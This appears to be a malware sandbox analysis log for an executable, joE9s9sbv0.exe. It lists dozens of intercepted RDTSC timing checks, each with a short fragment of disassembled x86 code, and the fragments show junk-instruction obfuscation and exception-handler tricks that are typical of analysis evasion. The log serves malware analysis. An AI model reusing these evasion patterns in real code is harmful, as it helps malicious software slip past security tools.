Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A93B1C second address: A93B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007FDC0050BD5Eh 0x0000000b popad 0x0000000c nop 0x0000000d jl 00007FDC0050BD4Bh 0x00000013 mov esi, 003C622Ah 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FDC0050BD48h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 stc 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+129E1A08h], ecx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FDC0050BD4Eh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9722C second address: A97242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FDC00CE27ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A97776 second address: A9777B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9777B second address: A9779E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDC00CE27B9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9779E second address: A977A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A977A4 second address: A977A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A977A8 second address: A977AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9994A second address: A99A15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDC00CE27B9h 0x00000008 jmp 00007FDC00CE27ABh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FDC00CE27B5h 0x00000016 nop 0x00000017 mov dword ptr [ebp+129E3279h], edx 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007FDC00CE27A8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 xor di, 863Eh 0x0000003e xor dword ptr [ebp+129E3874h], ebx 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push ebp 0x00000049 call 00007FDC00CE27A8h 0x0000004e pop ebp 0x0000004f mov dword ptr [esp+04h], ebp 0x00000053 add dword ptr [esp+04h], 00000017h 0x0000005b inc ebp 0x0000005c push ebp 0x0000005d ret 0x0000005e pop ebp 0x0000005f ret 0x00000060 mov dword ptr [ebp+129E1A25h], edi 0x00000066 mov edi, dword ptr [ebp+129E2BE9h] 0x0000006c xchg eax, esi 0x0000006d jmp 00007FDC00CE27B1h 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push edx 0x00000076 jmp 00007FDC00CE27B7h 0x0000007b pop edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9AAAC second address: A9AAC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9AAC3 second address: A9AAE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnp 00007FDC00CE27A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9AAE2 second address: A9AAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A97948 second address: A97962 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jno 00007FDC00CE27A6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A97962 second address: A979D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 mov ebx, 06FEF800h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a or edi, 295FB2EDh 0x00000020 mov eax, dword ptr [ebp+129E03D5h] 0x00000026 jbe 00007FDC0050BD4Ch 0x0000002c sub ebx, dword ptr [ebp+129E30BBh] 0x00000032 push FFFFFFFFh 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007FDC0050BD48h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e jmp 00007FDC0050BD52h 0x00000053 nop 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 push ebx 0x0000005a pop ebx 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F823 second address: A4F827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F827 second address: A4F82B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F82B second address: A4F831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F831 second address: A4F850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FDC0050BD46h 0x0000000e jmp 00007FDC0050BD51h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F850 second address: A4F85A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F85A second address: A4F87F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FDC0050BD57h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9F45E second address: A9F4CA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007FDC00CE27AEh 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FDC00CE27A8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 movzx edi, si 0x00000037 pushad 0x00000038 mov edi, 50E7AEA0h 0x0000003d mov al, 08h 0x0000003f popad 0x00000040 push 00000000h 0x00000042 sub dword ptr [ebp+12B94B32h], eax 0x00000048 push 00000000h 0x0000004a mov ebx, edx 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e je 00007FDC00CE27A8h 0x00000054 push esi 0x00000055 pop esi 0x00000056 pop eax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9F4CA second address: A9F4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9F4CE second address: A9F4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A98AF5 second address: A98B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FDC0050BD4Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A98B0D second address: A98B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC00CE27B2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A98B24 second address: A98B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC0050BD58h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99B3B second address: A99B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99B41 second address: A99B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99B45 second address: A99B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99B49 second address: A99BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, 1D4FBF90h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FDC0050BD48h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov di, 6C07h 0x00000033 mov dword ptr [ebp+129E3014h], edx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 sub dword ptr [ebp+12B94B32h], ecx 0x00000046 mov ebx, 57D63721h 0x0000004b mov eax, dword ptr [ebp+129E0951h] 0x00000051 mov ebx, dword ptr [ebp+129E1F91h] 0x00000057 jmp 00007FDC0050BD51h 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push esi 0x00000061 call 00007FDC0050BD48h 0x00000066 pop esi 0x00000067 mov dword ptr [esp+04h], esi 0x0000006b add dword ptr [esp+04h], 00000016h 0x00000073 inc esi 0x00000074 push esi 0x00000075 ret 0x00000076 pop esi 0x00000077 ret 0x00000078 mov dword ptr [ebp+12B94BE5h], eax 0x0000007e nop 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99BE4 second address: A99BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99BE8 second address: A99BF2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA260E second address: AA2612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA2612 second address: AA2672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FDC0050BD48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+129E2C39h] 0x0000002a push 00000000h 0x0000002c movzx ebx, di 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FDC0050BD48h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b adc di, BB2Ch 0x00000050 push eax 0x00000051 pushad 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA2672 second address: AA2678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA36E1 second address: AA371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push ebx 0x00000008 call 00007FDC0050BD48h 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 add dword ptr [esp+04h], 0000001Bh 0x0000001a inc ebx 0x0000001b push ebx 0x0000001c ret 0x0000001d pop ebx 0x0000001e ret 0x0000001f mov bh, 16h 0x00000021 push 00000000h 0x00000023 movsx ebx, di 0x00000026 push 00000000h 0x00000028 mov bx, dx 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push esi 0x00000030 pop esi 0x00000031 push ebx 0x00000032 pop ebx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA371E second address: AA372D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA372D second address: AA373F instructions: 0x00000000 rdtsc 0x00000002 js 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA373F second address: AA3744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA278D second address: AA2791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA2791 second address: AA2797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA2797 second address: AA279B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA279B second address: AA279F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA3984 second address: AA39AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FDC0050BD46h 0x00000009 jmp 00007FDC0050BD59h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA55F3 second address: AA55F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA68D9 second address: AA68DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA58C0 second address: AA58D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDC00CE27ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA7834 second address: AA7839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA69E4 second address: AA69E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA69E8 second address: AA69EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA69EE second address: AA6A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push dword ptr fs:[00000000h] 0x00000012 or dword ptr [ebp+12B77825h], edi 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov edi, 5B638ED3h 0x00000024 mov eax, dword ptr [ebp+129E0A8Dh] 0x0000002a mov dword ptr [ebp+129E35BAh], ecx 0x00000030 push FFFFFFFFh 0x00000032 pushad 0x00000033 sbb ax, 7D9Dh 0x00000038 mov dl, 03h 0x0000003a popad 0x0000003b nop 0x0000003c jmp 00007FDC00CE27B4h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 jmp 00007FDC00CE27B2h 0x0000004a pop eax 0x0000004b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA6A55 second address: AA6A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDC0050BD46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA8686 second address: AA86F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDC00CE27A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push ebx 0x0000000e jmp 00007FDC00CE27AEh 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FDC00CE27A8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov ebx, 66F320E9h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FDC00CE27A8h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 push edi 0x00000056 pop edi 0x00000057 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AAFBE0 second address: AAFBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AAFBE7 second address: AAFBF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ABh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A54A0C second address: A54A15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A54A15 second address: A54A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jnp 00007FDC00CE27B2h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A440C0 second address: A440D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Bh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A440D0 second address: A440DC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDC00CE27AEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A440DC second address: A440E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A440E4 second address: A440F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FDC00CE27A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AB2DDD second address: AB2DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AB2DE3 second address: AB2DF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AB58C6 second address: AB58CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AB58CC second address: AB58D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABEF11 second address: ABEF2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDC0050BD57h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABEF2E second address: ABEF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABEF34 second address: ABEF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABF480 second address: ABF48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDC00CE27A6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABF48D second address: ABF493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABF61B second address: ABF62F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABFA4A second address: ABFA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Dh 0x00000009 jmp 00007FDC0050BD53h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC0074 second address: AC0079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC0079 second address: AC007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC5A03 second address: AC5A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05422 second address: B05426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
